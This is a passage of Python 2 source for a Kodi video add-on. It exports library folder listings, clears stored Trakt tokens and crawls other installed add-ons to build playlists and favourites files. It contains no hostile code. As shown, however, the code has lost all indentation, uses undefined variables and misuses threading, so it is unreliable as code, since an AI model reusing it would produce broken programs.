elif toggling == True and xbmc.getCondVisibility("Skin.HasSetting(Toggling)") == False: toggle_preferred_toggle()
else: pass
@plugin.route('/export')
def export_library():
export_movies_library()
export_tv_library()
@plugin.route('/export/movies')
def export_movies_library():
folder_path = plugin.get_setting(SETTING_MOVIES_LIBRARY_FOLDER, unicode)
if not xbmcvfs.exists(folder_path): return dialogs.notify(msg='Movies folder', title='Absent', delay=5000, image=get_icon_path("movies"))
ids = ""
movies = xbmcvfs.listdir(folder_path)[0]
if len(movies) < 1: return dialogs.notify(msg='Movies folder', title='Empty', delay=5000, image=get_icon_path("movies"))
else :
for movie in movies: ids = ids + str(movie) + '\n'
movies_backup_file_path = "special://profile/addon_data/plugin.video.plexodusplayer/movies_to_add.bak"
if xbmcvfs.exists(movies_backup_file_path): os.remove(xbmc.translatePath(movies_backup_file_path))
if not xbmcvfs.exists(movies_backup_file_path):
batch_add_file = xbmcvfs.File(movies_backup_file_path, 'w')
batch_add_file.write(ids)
batch_add_file.close()
dialogs.notify(msg="Movies", title="Backed up", delay=5000, image=get_icon_path("movies"))
@plugin.route('/export/tv')
def export_tv_library():
folder_path = plugin.get_setting(SETTING_TV_LIBRARY_FOLDER, unicode)
if not xbmcvfs.exists(folder_path): return dialogs.notify(msg='TVShows folder', title='Absent', delay=5000, image=get_icon_path("tv"))
ids = ""
shows = xbmcvfs.listdir(folder_path)[0]
if len(shows) < 1: return dialogs.notify(msg='TVShows folder', title='Empty', delay=5000, image=get_icon_path("tv"))
else :
for show in shows: ids = ids + str(show) + '\n'
shows_backup_file_path = "special://profile/addon_data/plugin.video.plexodusplayer/shows_to_add.bak"
if xbmcvfs.exists(shows_backup_file_path): os.remove(xbmc.translatePath(shows_backup_file_path))
if not xbmcvfs.exists(shows_backup_file_path):
batch_add_file = xbmcvfs.File(shows_backup_file_path, 'w')
batch_add_file.write(ids)
batch_add_file.close()
dialogs.notify(msg="TVShows", title="Backed up", delay=5000, image=get_icon_path("tv"))
@plugin.route('/play/<label>')
def play_by_label(label):
types = [_("Movies"), _("TV shows"), _("Channels")]
selection = dialogs.select("{0} {1}".format(_("Choose"), _("Type").lower()), [item for item in types])
if selection == 0: xbmc.executebuiltin("RunPlugin(plugin://plugin.video.plexodusplayer/movies/play_by_name/{0}/en)".format(label))
elif selection == 1: xbmc.executebuiltin("RunPlugin(plugin://plugin.video.plexodusplayer/tv/play_by_name_only/{0}/en)".format(label))
elif selection == 2: xbmc.executebuiltin("RunPlugin(plugin://plugin.video.plexodusplayer/live/{0}/None/en/context)".format(label))
@plugin.route('/cleartrakt')
def clear_trakt():
msg = "{0} {1} {2}?".format(_("Remove"), "Trakt", _("Settings").lower())
if dialogs.yesno("{0} {1}".format(_("Unlock"), "Trakt"), msg):
plugin.set_setting(SETTING_TRAKT_ACCESS_TOKEN, "")
plugin.set_setting(SETTING_TRAKT_REFRESH_TOKEN, "")
plugin.set_setting(SETTING_TRAKT_EXPIRES_AT, "")
@plugin.route('/cleartraktcache')
def clear_trakt_cache():
for filename in os.listdir(plugin.storage_path):
if filename == "trakt":
try:
if os.path.isfile(file_path): os.unlink(file_path)
elif os.path.isdir(file_path): shutil.rmtree(file_path)
except Exception, e: traceback.print_exc()
@plugin.route('/printjson/<path>')
def printjson(path):
response = RPC.files.get_directory(media="files", directory="plugin://plugin.video.crackler/?foldername=Movies&mode=movies_folder", properties=["title","artist","albumartist","genre","year","rating","album","track","duration","comment","lyrics","musicbrainztrackid","musicbrainzartistid","musicbrainzalbumid","musicbrainzalbumartistid","playcount","fanart","director","trailer","tagline","plot","plotoutline","originaltitle","lastplayed","writer","studio","mpaa","cast","country","imdbnumber","premiered","productioncode","runtime","set","showlink","streamdetails","top250","votes","firstaired","season","episode","showtitle","thumbnail","file","resume","artistid","albumid","tvshowid","setid","watchedepisodes","disc","tag","art","genreid","displayartist","albumartistid","description","theme","mood","style","albumlabel","sorttitle","episodeguide","uniqueid","dateadded","size","lastmodified","mimetype"])
xbmc.log("QQQQQ plugin://%s = %s" % (path.replace("%2f", "/"), str(response)))
@plugin.route('/mapall')
def mapall():
exclusions = ["plugin.audio.dradio","plugin.audio.mixcloud","plugin.image.dilbert","plugin.video.chefkoch_de","plugin.video.goldpagemedia","plugin.video.youtube","plugin.audio.booksshouldbefree","plugin.audio.jambmc","plugin.video.7tv",]
dones = ["plugin.audio.abradio.cz","plugin.audio.cherrymusic","plugin.audio.deejayIt.reloaded","plugin.audio.detektorfm","plugin.audio.di.fm","plugin.audio.diyfm","plugin.audio.dr.dk.netradio","plugin.audio.groove","plugin.audio.hongkongradio","plugin.audio.icecast","plugin.audio.internet.archive","plugin.audio.jazzradio.com","plugin.audio.listenliveeu","plugin.audio.modland","plugin.audio.mozart","plugin.audio.nectarine","plugin.audio.npr","plugin.audio.podcatcher","plugin.audio.qobuz","plugin.audio.radioma","plugin.audio.radiotunes.com","plugin.audio.radio_de","plugin.audio.rainymood.com","plugin.audio.ramfm","plugin.audio.rautemusik","plugin.audio.rdio","plugin.audio.releasefm","plugin.audio.relive","plugin.audio.shoutcast","plugin.audio.rockradio.com","plugin.audio.sgradio",]
audio_addons = ["plugin.audio.abcradionational", "plugin.audio.abradio.cz", "plugin.audio.booksshouldbefree", "plugin.audio.cherrymusic", "plugin.audio.deejayIt.reloaded", "plugin.audio.detektorfm", "plugin.audio.di.fm", "plugin.audio.diyfm", "plugin.audio.dr.dk.netradio", "plugin.audio.dradio", "plugin.audio.groove", "plugin.audio.hongkongradio", "plugin.audio.icecast", "plugin.audio.internet.archive", "plugin.audio.jambmc", "plugin.audio.jazzradio.com", "plugin.audio.listenliveeu", "plugin.audio.mixcloud", "plugin.audio.modland", "plugin.audio.mozart", "plugin.audio.nectarine", "plugin.audio.npr", "plugin.audio.podcatcher", "plugin.audio.qobuz", "plugin.audio.radioma", "plugin.audio.radiotunes.com", "plugin.audio.radio_de", "plugin.audio.rainymood.com", "plugin.audio.ramfm", "plugin.audio.rautemusik", "plugin.audio.rdio", "plugin.audio.releasefm", "plugin.audio.relive", "plugin.audio.resetradio", "plugin.audio.rne", "plugin.audio.rockradio.com", "plugin.audio.sgradio", "plugin.audio.shoutcast", "plugin.audio.somafm", "plugin.audio.soundcloud", "plugin.audio.sverigesradio", "plugin.audio.tilos", "plugin.audio.tripler", "plugin.audio.vgpodcasts", "plugin.audio.wimp"]
misc_addons = ["plugin.dbmc", "plugin.onedrive", "plugin.picture.bromix.break", "plugin.program.isybrowse", "plugin.program.jdownloader", "plugin.program.mceremote", "plugin.program.newgrounds", "plugin.program.rpcalendar", "plugin.program.super.favourites", "plugin.program.tvhighlights", "plugin.program.utorrent", "plugin.program.video.node.editor", "plugin.program.wienerlinien", "plugin.programm.xbmcmail"]
image_addons = ["plugin.image.500px", "plugin.image.cheezburger_network", "plugin.image.cyanidehappiness", "plugin.image.dilbert", "plugin.image.flickr", "plugin.image.garfield", "plugin.image.google", "plugin.image.iphoto", "plugin.image.jpfoto", "plugin.image.moebooru", "plugin.image.xkcd", "plugin.image.xzen"]
video_addons_take_too_long = ["plugin.video.clipfish.de", "plugin.video.7tv", "plugin.video.ardmediathek_de", "plugin.video.7tv", "plugin.video.ardmediathek_de", "plugin.video.comingsoon.it", "plugin.video.corbettreport", "plugin.video.espn_3", ]
video_addons_exclusions = ["plugin.video.docu", ]
video_addons_done = ["plugin.video.3bmeteo", "plugin.video.4players", "plugin.video.9gagtv", "plugin.video.abcradionational", "plugin.video.amaproracing", "plugin.video.ansa", "plugin.video.arretsurimages", "plugin.video.arteplussept", "plugin.video.arte_tv", "plugin.video.attactv", "plugin.video.borsentv.dk", "plugin.video.botchamania", "plugin.video.br3", "plugin.video.break_com", "plugin.video.btbn", "plugin.video.cessfull", "plugin.video.cnet.podcasts", "plugin.video.codigofacilito.com", "plugin.video.collegehumor", "plugin.video.comicvine", "plugin.video.confreaks", "plugin.video.corrieretv", "plugin.video.couchpotato_manager", "plugin.video.crackler", "plugin.video.creationtoday_org", "plugin.video.crunchyroll-takeout", "plugin.video.d17", "plugin.video.d8", "plugin.video.deredactie", "plugin.video.disclose_tv", "plugin.video.disneychannel_de", "plugin.video.dmax", "plugin.video.dmax_de", "plugin.video.dmi.dk", "plugin.video.dokumonster", "plugin.video.dr.dk.bonanza", "plugin.video.dr.dk.live", "plugin.video.dr.dk.podcast", "plugin.video.drnu", "plugin.video.dumpert", "plugin.video.dzango.tv", "plugin.video.earthtouch", "plugin.video.eevblog", "plugin.video.ekkofilm.dk", "plugin.video.elisa.viihde", "plugin.video.engadget", "plugin.video.enigmatv", "plugin.video.eredivisie-live", "plugin.video.esa", "plugin.video.eso", ]
video_addons = ["plugin.video.crackler"]
video_addonsb = ["plugin.video.eyetv.parser", "plugin.video.fattoquotidianotv", "plugin.video.fernsehkritik", "plugin.video.filmarkivet", "plugin.video.filmsforaction", "plugin.video.floptv", "plugin.video.focus-online.de", "plugin.video.fox.news", "plugin.video.gaffa.tv", "plugin.video.gamegurumania", "plugin.video.gamestar", "plugin.video.geekandsundry", "plugin.video.gfq", "plugin.video.giantbomb", "plugin.video.glwiz", "plugin.video.godtube_com", "plugin.video.goldpagemedia", "plugin.video.golem.de", "plugin.video.gq", "plugin.video.greenpeace", "plugin.video.gronkh.de", "plugin.video.guardian", "plugin.video.hallmark", "plugin.video.hdtrailers_net", "plugin.video.heritagechannel", "plugin.video.hgtv", "plugin.video.hgtv.canada", "plugin.video.hollywoodreporter", "plugin.video.ign_com", "plugin.video.ilmeteo", "plugin.video.infowars", "plugin.video.iplayerwww", "plugin.video.irishtv", "plugin.video.itbn_org", "plugin.video.itunes_podcasts", "plugin.video.jeuxvideo.com", "plugin.video.johnlocker", "plugin.video.jupiterbroadcasting", "plugin.video.jwtv-unofficial", "plugin.video.khanacademy", "plugin.video.kino.dk", "plugin.video.kordkutters", "plugin.video.lachschon_de", "plugin.video.lacosa", "plugin.video.latelelibre_fr", "plugin.video.livestream", "plugin.video.manoto", "plugin.video.massengeschmack", "plugin.video.media-ccc-de", "plugin.video.mediacorp", "plugin.video.metacafe", "plugin.video.plexodusplayer", "plugin.video.metalvideo", "plugin.video.mk", "plugin.video.mlg.tv", "plugin.video.mms", "plugin.video.moontv.fi", "plugin.video.mtv.it", "plugin.video.mtv_de", "plugin.video.musicvideojukebox_net", "plugin.video.mycanal", "plugin.video.mytv_bg", "plugin.video.myvevo", "plugin.video.myvideo_de", "plugin.video.nasa", "plugin.video.nbcsnliveextra", "plugin.video.nederland24", "plugin.video.netzkino_de", "plugin.video.nfl-teams", "plugin.video.nfl.com", "plugin.video.nfl.gamepass", "plugin.video.nhl-gamecenter-live", "plugin.video.nick_de", "plugin.video.nlhardwareinfo", "plugin.video.noco", "plugin.video.nolife", "plugin.video.nos", "plugin.video.npr", "plugin.video.nrk", "plugin.video.nrwision", "plugin.video.nytimes", "plugin.video.on_aol", "plugin.video.orftvthek", "plugin.video.oxygen", "plugin.video.pcloud-video-streaming", "plugin.video.photocasts", "plugin.video.pinkbike", "plugin.video.pixel.tv", "plugin.video.popcornflix", "plugin.video.popcorntv", "plugin.video.powerunlimited", "plugin.video.previewnetworks", "plugin.video.puls4", "plugin.video.putio", "plugin.video.radbox", "plugin.video.railscasts", "plugin.video.raitv", "plugin.video.realtimetvitalia", "plugin.video.reddit_tv", "plugin.video.retro_tv", "plugin.video.roosterteeth", "plugin.video.rt", "plugin.video.rtlxl", "plugin.video.rtpplay", "plugin.video.rts", "plugin.video.s04tv", "plugin.video.sagetv", "plugin.video.sapo", "plugin.video.sarpur", "plugin.video.schaetzederwelt", "plugin.video.science.friday", "plugin.video.serviziopubblico", "plugin.video.servustv_com", "plugin.video.sgtv", "plugin.video.si", "plugin.video.skytg24", "plugin.video.smithsonian", "plugin.video.snagfilms", "plugin.video.southpark_unofficial", "plugin.video.spiegel_tv", "plugin.video.sportube", "plugin.video.sprout", "plugin.video.spurs-tv", "plugin.video.srf_podcast_ch", "plugin.video.supertennis", "plugin.video.svtplay", "plugin.video.tagen.tv", "plugin.video.tagesschau", "plugin.video.tagesschauvideoblog", "plugin.video.ted.talks", "plugin.video.tekthing", "plugin.video.testtube", "plugin.video.theblaze", "plugin.video.thenewboston", "plugin.video.time_com", "plugin.video.tlc_de", "plugin.video.tmos", "plugin.video.toonjet", "plugin.video.trailer.addict", "plugin.video.trakt_list_manager", "plugin.video.travel", "plugin.video.tv2.dk", "plugin.video.tv2regionerne.dk", "plugin.video.tv3.cat", "plugin.video.tv3play.dk", "plugin.video.tvkc", "plugin.video.tvo", "plugin.video.tvokids", "plugin.video.tvvn", "plugin.video.tweakers", "plugin.video.twit", "plugin.video.udacity", "plugin.video.ukmvjb", "plugin.video.uzg", "plugin.video.vgtv", "plugin.video.videobash_com", "plugin.video.videovideo.dk", "plugin.video.viewster", "plugin.video.vimcasts", "plugin.video.vimeo", "plugin.video.vine", "plugin.video.virginradio.it", "plugin.video.vitaminl_tv", "plugin.video.voapersian", "plugin.video.vvvvid", "plugin.video.wabc", "plugin.video.watchmojo", "plugin.video.watson", "plugin.video.welt_der_wunder", "plugin.video.wimp", "plugin.video.wnbc", "plugin.video.worldstarhiphop", "plugin.video.wsj", "plugin.video.yogaglo", "plugin.video.youtube", "plugin.video.zattoobox", "plugin.video.zdf_de_lite", "plugin.video.zeemarathi", "plugin.video.zeetv"]
i = 0
for item in video_addons:
if xbmc.getCondVisibility("System.HasAddon(%s)" % item):
itemthread = threading.Thread(target=test(item, 2))
itemthread.start()
@plugin.route('/test/<id>/<maxdepth>')
def test(id, maxdepth):
try: maxdepth = int(maxdepth)
except: return
dialogs.notify(msg='MaxDepth = %d' % maxdepth, title='Id = %s' % id, delay=5000, image=get_icon_path("metalliq"))
import xbmcaddon
import re
from rpc import RPC
INFOTYPES = ["author", "changelog", "description", "disclaimer", "fanart", "icon", "id", "name", "path", "profile", "stars", "summary", "type", "version"]
ADDON = xbmcaddon.Addon(id)
addon_info_string = ""
for infotype in INFOTYPES:
addon_info_string += "# %-11s = %s\n" % (infotype, ADDON.getAddonInfo(infotype).replace("14.o\\portable_data\\",""))
base = u'plugin://{0}/'.format(id)
dirs_total = [u'plugin://{0}/'.format(id)]
dirs_done = [u'plugin://{0}/'.format(id)]
dirs_labels = [u'{0}'.format(re.sub(r'\[[^)].*?\]', '', ADDON.getAddonInfo("name")))]
dirs_thumbs = [u'{0}'.format(re.sub(r'\[[^)].*?\]', '', ADDON.getAddonInfo("icon")))]
dirs_backgr = [u'{0}'.format(re.sub(r'\[[^)].*?\]', '', ADDON.getAddonInfo("fanart")))]
streams = {}
depth = 0
file_labels = []
file_labels_raw = []
response = RPC.files.get_directory(media="files", directory=base, properties=["thumbnail","fanart","description","plot","art"])
if "files" in response:
files = response["files"]
links = {}
thumbnails = {}
backgrounds = {}
descriptions = {}
streams[base] = {}
for f in files:
if f["filetype"] == "directory":
if f["file"] not in dirs_total:
dirs_total.append(f["file"])
if f["thumbnail"]: dirs_thumbs.append(f["thumbnail"])
else: dirs_thumbs.append("")
if f["fanart"]: dirs_thumbs.append(f["fanart"])
else: dirs_backgr.append("")
label = re.sub(r'\[[^)].*?\]', '', f["label"])
dirs_labels.append(label)
if f["filetype"] == "file":
file_labels_raw.append(f["label"])
label = re.sub(r'\[[^)].*?\]', '', f["label"])
file = f["file"]
while (label in links):
label = "%s." % label
links[label] = file
if f["art"]: thumbnails[label] = f["art"]
elif f["thumbnail"]: thumbnails[label] = f["thumbnail"]
else: thumbnails[label] = ""
backgrounds[label] = f["fanart"]
if "description" in response: descriptions[label] = f["description"].replace(" ", "+").replace('"', '"').replace("'", "'").replace(",", "%2c")
elif "plot" in response: descriptions[label] = f["plot"].replace(" ", "+").replace('"', '"').replace("'", "'").replace(",", "%2c")
else: descriptions[label] = ""
file_labels.append(label)
elif not 'error' in response: pass
else: return
while len(dirs_total) > len(dirs_done) and depth != maxdepth:
depth = depth + 1
dialogs.notify(msg='Depth', title='%d' % depth, delay=5000, image=get_icon_path("metalliq"))
dirs = [x for x in dirs_total if x not in dirs_done and "search" not in x and "personal" not in x]
for d in dirs:
response = RPC.files.get_directory(media="files", directory=d, properties=["thumbnail","fanart","description","plot"])
dirs_done.append(d)
if "files" not in response: pass
elif not 'error' in response:
files = response["files"]
links = {}
thumbnails = {}
backgrounds = {}
descriptions = {}
streams[d] = {}
for f in files:
if f["filetype"] == "file":
if "/default" in f["file"]: pass
else:
file_labels_raw.append(f["label"])
label = re.sub(r'\[[^)].*?\]', '', f["label"])
label = label.strip(" ").replace("Stream - ", "").replace("stream - ", "")
file = f["file"]
while (label in links):
label = "%s.." % label
links[label] = file
if f["thumbnail"]: thumbnails[label] = f["thumbnail"]
else: thumbnails[label] = "http%3a%2f%2fmirrors.kodi.tv%2faddons%2fhelix%2f{0}%2ficon.png".format(ADDON.getAddonInfo("id"))
if f["fanart"]: backgrounds[label] = f["fanart"]
else: backgrounds[label] = "http%3a%2f%2fmirrors.kodi.tv%2faddons%2fhelix%2f{0}%2ffanart.jpg".format(ADDON.getAddonInfo("id"))
if "description" in response: descriptions[label] = f["description"]
else: descriptions[label] = ""
streams[d][label] = file
file_labels.append(label)
if f["filetype"] == "directory":
if "personal" in f["file"]: pass
else:
if f["file"] not in dirs_total:
dirs_total.append(f["file"])
label = re.sub(r'\[[^)].*?\]', '', f["label"])
dirs_labels.append(label)
if f["thumbnail"]: dirs_thumbs.append(f["thumbnail"])
else: dirs_thumbs.append("http%3a%2f%2fmirrors.kodi.tv%2faddons%2fhelix%2f{0}%2ficon.png".format(ADDON.getAddonInfo("id")))
if f["fanart"]: dirs_thumbs.append(f["fanart"])
else: dirs_thumbs.append("http%3a%2f%2fmirrors.kodi.tv%2faddons%2fhelix%2f{0}%2ffanart.jpg".format(ADDON.getAddonInfo("id")))
else: pass
if depth == maxdepth: break
id_folder = xbmc.translatePath("special://profile/addon_data/plugin.program.super.favourites/Super Favourites/{0}/".format(ADDON.getAddonInfo("id")))
name_folder = xbmc.translatePath("special://profile/addon_data/plugin.program.super.favourites/Super Favourites/{0}/".format(ADDON.getAddonInfo("name")))
if not xbmcvfs.exists(id_folder): xbmcvfs.mkdir(id_folder)
if not xbmcvfs.exists(name_folder): xbmcvfs.mkdir(name_folder)
#id_file = "%-36s (%s)%s" % (ADDON.getAddonInfo("id"), ADDON.getAddonInfo("name"), ".ini")
id_file = "%s (%s)%s" % (ADDON.getAddonInfo("id"), ADDON.getAddonInfo("name"), ".ini")
name_file = "%s (%s)%s" % (ADDON.getAddonInfo("name"), ADDON.getAddonInfo("id"), ".ini")
id_filename = os.path.join(id_folder, id_file)
name_filename = os.path.join(name_folder, name_file)
f = xbmcvfs.File(id_filename,"wb")
g = xbmcvfs.File(name_filename,"wb")
line = '%s' % addon_info_string
f.write(line.encode("utf8"))
g.write(line.encode("utf8"))
for d in sorted(streams):
num = dirs_total.index(d)
line = '\n\n_dirs["{0}"] = {1}\n'.format(dirs_labels[num] , d)
f.write(line.encode("utf8"))
g.write(line.encode("utf8"))
channels = streams[d]
for channel in sorted(channels):
url = channels[channel]
if not channel.endswith(".."): label = channel
elif channel.endswith(".."):
ows = channel.count('..')
prelabel = channel.rstrip("..")
fws = prelabel.count('..')
label = "{0} ({1})".format(prelabel, ows - fws)
line = '\n_streams["%s"] = %s' % (label.replace('"','\\\"'), url)
f.write(line.encode("utf8"))
g.write(line.encode("utf8"))
dirs_not_done = [x for x in dirs_total if x not in dirs_done]
if len(dirs_not_done) > 0:
f.write("\n\ndirs_not_done=")
g.write("\n\ndirs_not_done=")
line = str(dirs_not_done)
f.write(line.encode("utf8"))
g.write(line.encode("utf8"))
f.close()
g.close()
#id_file = "%-36s (%s)%s" % (ADDON.getAddonInfo("id"), ADDON.getAddonInfo("name"), ".m3u")
id_file = "%s (%s)%s" % (ADDON.getAddonInfo("id"), ADDON.getAddonInfo("name"), ".m3u")
name_file = "%s (%s)%s" % (ADDON.getAddonInfo("name"), ADDON.getAddonInfo("id"), ".m3u")
id_filename = os.path.join(id_folder, id_file)
name_filename = os.path.join(name_folder, name_file)
f = xbmcvfs.File(id_filename,"wb")
g = xbmcvfs.File(name_filename,"wb")
line = '#EXTM3U\n\n%s' % addon_info_string
f.write(line.encode("utf8"))
g.write(line.encode("utf8"))
if "plugin.audio" in ADDON.getAddonInfo("id"): radio = ' radio="true"'
else: radio = ''
for d in sorted(streams):
num = dirs_total.index(d)
channels = streams[d]
for channel in sorted(channels):
url = channels[channel]
try: thumb = thumbnails[channel]
except: thumb = "http%3a%2f%2fmirrors.kodi.tv%2faddons%2fhelix%2f{0}%2ficon.png".format(ADDON.getAddonInfo("id"))
if not channel.endswith(".."): label = channel
elif channel.endswith(".."):
ows = channel.count('..')
prelabel = channel.rstrip("..")
fws = prelabel.count('..')
label = "{0} ({1})".format(prelabel, ows - fws)
line = '\n#EXTINF:-1 tvg-id="{0}" tvg-name="{0}" tvg-logo="{1}" group-title="{2}"{3},{0}\n{4}'.format(label.replace(',',' -').replace('"','\''), thumb, ADDON.getAddonInfo("name").replace(',',' -'), radio, url)
f.write(line.encode("utf8"))
g.write(line.encode("utf8"))
f.close()
g.close()
file = "favourites.xml"
id_filename = os.path.join(id_folder, file)
name_filename = os.path.join(name_folder, file)
f = xbmcvfs.File(id_filename,"wb")
g = xbmcvfs.File(name_filename,"wb")
line = "<favourites>"
f.write(line.encode("utf8"))
g.write(line.encode("utf8"))
for d in sorted(streams):
num = dirs_total.index(d)
channels = streams[d]
for channel in sorted(channels):
url = channels[channel]
try: thumb = thumbnails[channel].rstrip("/")
except: thumb = "http://mirrors.kodi.tv/addons/helix/{0}/icon.png".format(ADDON.getAddonInfo("id")).rstrip("/")
if "image://" in thumb:
thumb = thumb.replace("image://","").replace("%3a",":").replace("%2f","/").replace("%5c","\\")
thumb = thumb.replace(ADDON.getAddonInfo("icon").replace("icon.png",""), "special://home/addons/{0}/".format(ADDON.getAddonInfo("id"))).replace("\\","/")
try: fanart = backgrounds[channel]
except: fanart = "http://mirrors.kodi.tv/addons/helix/{0}/fanart.jpg".format(ADDON.getAddonInfo("id"))
if "image://" in fanart:
fanart = fanart.replace("image://","").replace("%3a",":").replace("%2f","/").replace("%5c","\\")
fanart = fanart.replace(ADDON.getAddonInfo("icon").replace("icon.png",""), "special://home/addons/{0}/".format(ADDON.getAddonInfo("id"))).replace("\\","/")
try: description = descriptions[channel]
except: description = ""
if not channel.endswith(".."): label = channel
elif channel.endswith(".."):
ows = channel.count('..')
prelabel = channel.rstrip("..")
fws = prelabel.count('..')
label = "{0} ({1})".format(prelabel, ows - fws)
# prethumb = url.split("v_id=")[1]
# line = '\n <favourite name="{0}" thumb="http://images-us-az.crackle.com/profiles/channels/{1}/OneSheetImage_800x1200.jpg">PlayMedia("{2}&sf_options=fanart%3D{3}&desc%3D{4}%26_options_sf")</favourite>'.format(label.replace("'","'").replace('"',"""), url.split("v_id=")[1], url, fanart, description)
line = '\n <favourite name="{0}" thumb="{1}">PlayMedia("{2}&sf_options=fanart%3D{3}&desc%3D{4}%26_options_sf")</favourite>'.format(label.replace("'","'").replace('"',"""), thumb, url, fanart, description)
f.write(line.encode("utf8"))
g.write(line.encode("utf8"))
line = "\n</favourites>"
f.write(line.encode("utf8"))
g.write(line.encode("utf8"))
f.close()
g.close()
dialogs.notify(msg='Mapping Finished', title='%d total %d done' % (len(dirs_total), len(dirs_done)), delay=5000, image=get_icon_path("metalliq"))
@plugin.route('/testing')
def testing():
results = {}
for i in ["search", "searchalbum", "searchtrack", "searchmdvd", "discography", "discography-mb"]:
results[i] = audiodb.search(mode=i, artist=artist_name, album=album_name, track=track_name)
lib = plugin.get_setting(SETTING_MOVIES_LIBRARY_FOLDER, unicode)
f = xbmcvfs.File("{0}artist.nfo".format(lib), 'w')
f.write(str(results))
f.close()
dialogs.notify(msg='Done', title='and Done', delay=5000, image=get_icon_path("metalliq"))
@plugin.route('/testingbakbak')
def testingbakbak():
library = {}
medias = ["movies", "tvshows", "musicvideos", "music", "live"]
for m in medias:
if m == "movies":
lib = plugin.get_setting(SETTING_MOVIES_LIBRARY_FOLDER, unicode)
ite = RPC.videolibrary.get_movies(properties=["title","year","playcount","fanart","originaltitle","imdbnumber","thumbnail","file"])["movies"]
elif m == "tvshows":
lib = plugin.get_setting(SETTING_TV_LIBRARY_FOLDER, unicode)
ite = RPC.videolibrary.get_tvshows(properties=["title","year","playcount","fanart","originaltitle","imdbnumber","thumbnail","file"])["tvshows"]
# elif m == "musicvideos":
# lib = plugin.get_setting(SETTING_MUSIC_LIBRARY_FOLDER, unicode)
# ite = RPC.videolibrary.get_musicvideos(properties=["title","year","playcount","fanart","originaltitle","imdbnumber","thumbnail","file"])["musicvideos"]
else: continue
liq = xbmcvfs.listdir(lib)[0]
for i in ite:
try:
f = xbmcvfs.File(os.path.join(lib, i["imdbnumber"], "player.info"))
i["player"] = f.read()
f.close()
except: i["player"] = "na"
f = xbmcvfs.File("{0}library.nfo".format(lib), 'w')
f.write(str(ite))
f.close()
dialogs.notify(msg='Done', title='and Done', delay=5000, image=get_icon_path("metalliq"))
# movie_items = RPC.videolibrary.get_movies(properties=["title","genre","year","rating","playcount","fanart","director","trailer","tagline","plot","plotoutline","originaltitle","lastplayed","writer","studio","mpaa","cast","country","imdbnumber","set","showlink","streamdetails","top250","votes","thumbnail","file","resume","setid","tag","art","sorttitle","dateadded"])["movies"]
# tvshow_items = RPC.videolibrary.get_tvshows(properties=["title","genre","year","rating","playcount","fanart","director","plot","originaltitle","lastplayed","studio","mpaa","imdbnumber","premiered","season","episode","file","watchedepisodes","tag","art","sorttitle","episodeguide","dateadded"])["tvshows"]
# if m == "movies":
# lib_folder = plugin.get_setting(SETTING_MOVIES_LIBRARY_FOLDER, unicode)
# movie_items = RPC.videolibrary.get_movies(properties=["title","genre","year","rating","playcount","fanart","director","trailer","tagline","plot","plotoutline","originaltitle","lastplayed","writer","studio","mpaa","country","imdbnumber","runtime","set","showlink","streamdetails","top250","votes","thumbnail","file","resume","setid","tag","sorttitle"])["movies"]
# if m == "tvshows":
# lib_folder = plugin.get_setting(SETTING_TV_LIBRARY_FOLDER, unicode)
# tvshow_items = RPC.videolibrary.get_tvshows(properties=["title","genre","year","rating","playcount","fanart","director","plot","originaltitle","lastplayed","studio","mpaa","imdbnumber","premiered","season","episode","file","watchedepisodes","tag","art","sorttitle","episodeguide","dateadded"])["tvshows"]
def testing2(type):
lib_folder = plugin.get_setting(SETTING_MOVIES_LIBRARY_FOLDER, unicode)
lib_items = xbmcvfs.listdir(lib_folder)[0]
players_tot = [p.id for p in get_players("movies")]
players_act = [p.id for p in active_players("movies")]
players_dis = []
for i in players_tot:
if i not in players_act: players_dis.append(i)
players_lib = {}
for x in lib_items:
player_file = xbmcvfs.File(os.path.join(lib_folder, x, "player.info"))
content = player_file.read()
player_file.close()
players_lib[x] = content
player_file.close()
plugin.log.info("lib_movies = {0}".format(lib_items))
plugin.log.info("tot_players = {0}".format(players_tot))
plugin.log.info("act_players = {0}".format(players_act))
plugin.log.info("dis_players = {0}".format(players_dis))
plugin.log.info("lib_players = {0}".format(players_lib))
tvshows_in_lib = RPC.videolibrary.get_tvshows(properties=["originaltitle", "imdbnumber", "year"])["tvshows"]
movies_in_lib = RPC.videolibrary.get_movies(properties=["originaltitle", "imdbnumber", "year"])["movies"]
plugin.log.info("tvshows_in_lib = {0}".format(tvshows_in_lib))
plugin.log.info("movies_in_lib = {0}".format(movies_in_lib))
sorted(["[B]{0}[/B]".format(p.clean_title) for p in players if p.id in plugin.get_setting(SETTING_MOVIES_ENABLED_PLAYERS, unicode)])
sorted(["[I]{0}[/I]".format(p.clean_title) for p in players if p.id not in plugin.get_setting(SETTING_MOVIES_ENABLED_PLAYERS, unicode)])
dialogs.notify(msg='Done', title='and Done', delay=5000, image=get_icon_path("metalliq"))
@plugin.route('/testingbak2')
def testingbak2():
library = {}
medias = ["movies", "tvshows", "musicvideos", "music", "live"]
lists = ["id", "imdb", "title", "otitle", "player"]
for m in medias:
library[m] = {}
if m == "movies":
lib_folder = plugin.get_setting(SETTING_MOVIES_LIBRARY_FOLDER, unicode)
items = RPC.videolibrary.get_movies(properties=["originaltitle", "imdbnumber", "year"])["movies"]
elif m == "tvshows":
lib_folder = plugin.get_setting(SETTING_TV_LIBRARY_FOLDER, unicode)
items = RPC.videolibrary.get_tvshows(properties=["originaltitle", "imdbnumber", "year"])["tvshows"]
# elif m == "musicvideos":
# lib_folder = plugin.get_setting(SETTING_MUSICVIDEOS_LIBRARY_FOLDER, unicode)
# items = RPC.videolibrary.get_musicvideos(properties=["originaltitle", "imdbnumber", "year"])["musicvideos"]
# elif m == "music":
# lib_folder = plugin.get_setting(SETTING_MUSIC_LIBRARY_FOLDER, unicode)
# items = RPC.audiolibrary.get_artists(properties=["title","artist","albumartist","genre","year","rating","album","track","duration","comment","lyrics","musicbrainztrackid","musicbrainzartistid","musicbrainzalbumid","musicbrainzalbumartistid","playcount","fanart","director","trailer","tagline","plot","plotoutline","originaltitle","lastplayed","writer","studio","mpaa","cast","country","imdbnumber","premiered","productioncode","runtime","set","showlink","streamdetails","top250","votes","firstaired","season","episode","showtitle","thumbnail","file","resume","artistid","albumid","tvshowid","setid","watchedepisodes","disc","tag","art","genreid","displayartist","albumartistid","description","theme","mood","style","albumlabel","sorttitle","episodeguide","uniqueid","dateadded","size","lastmodified","mimetype"])["artists"]
else: continue
library[m]["metalliq"] = xbmcvfs.listdir(lib_folder)[0]
for l in lists: library[m][l] = []
for i in items:
if i["imdbnumber"] not in library[m]["metalliq"]: library[m]["player"].append("na")
else:
f = xbmcvfs.File(os.path.join(lib_folder, i["imdbnumber"], "player.info"))
library[m]["player"].append(f.read())
f.close()
